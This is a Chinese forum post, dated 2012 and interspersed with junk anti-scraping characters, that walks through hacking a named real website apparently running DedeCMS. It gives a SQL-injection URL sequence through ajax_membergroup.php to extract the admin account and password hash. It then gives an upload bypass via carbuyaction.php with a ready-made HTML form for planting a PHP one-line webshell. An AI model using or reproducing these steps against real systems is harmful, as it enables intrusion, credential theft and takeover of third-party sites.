①注入漏洞。8 L: {+ g6 l- d
这站 http://www.political-security.com/" _+ b( h9 y$ e
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,7 z5 Y' u7 ^& p0 u
www.political-security.com/data/mysql_error_trace.inc 爆后台
2 ]" g. w8 p; ]; D& x- ]然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。9 F. i0 g8 t4 w9 U
然后写上语句 + K8 u( t* D; I' |+ y# }& K
查看管理员帐号
8 T+ @; m8 L( S" v- p$ ~$ C) Qhttp://www.political-security.co ... &membergroup=@`* d# W6 D7 R, _! p( o* W9 G$ d; J1 H2 |
1 n8 U: i$ ]3 E4 Uadmin
/ {" f% D' D# N5 _* d4 q4 k7 D% G) p) k# j- w2 g0 u6 r
查看管理员密码% {2 O% v) S! O, {: E3 f
http://www.political-security.co ... &membergroup=@`
! @% E% L% H+ m3 `/ @+ m/ g" C. E7 k/ A5 R/ N/ i/ q3 H
8d29b1ef9f8c5a5af429% e4 s7 O1 h6 U) ^' u% I" g: Q
3 D/ T1 o0 j0 n7 T
查看管理员密码
_5 w& @# [ X& `* @
1 I0 n/ L' s( o' d得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
* O$ D! `% k. ^. X- D2 C% I& [
9 x5 R. u6 g8 c: I: C8d2
; F- T v6 V5 o: R6 Y9b1ef9f8c5a5af42
/ ]" N, ]7 s; U* G* m9
; w/ g, U& v1 `* ?; _* C" R/ ]; ^2 ~- h& r4 }+ x. g2 q d
cmd5没解出来 只好测试第二个方法
9 }" H* s& s( W( x, |. \" j( |0 r( w( W& l- Z7 Y, Q; V- v
$ e: g6 M$ U8 \0 H- o②上传漏洞:$ E* o: Q. E6 A: ^% e! s! R! C
5 r3 U) E3 I, k# j/ t7 x只要登陆会员中心,然后访问页面链接8 p2 v, X$ S/ i( @0 h
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”! s9 D& f: I6 @# }: R
. @& Q3 M6 A/ s如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
7 B7 k& a4 {! B/ h
$ ^7 d) i8 [2 }$ e7 H2 l于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
/ s3 o% N! D( F/ A) k
s. z; U( I0 P0 }3 m<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
* W' Q; a# B. }或者
0 b" a/ r& F/ j8 V" ^即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对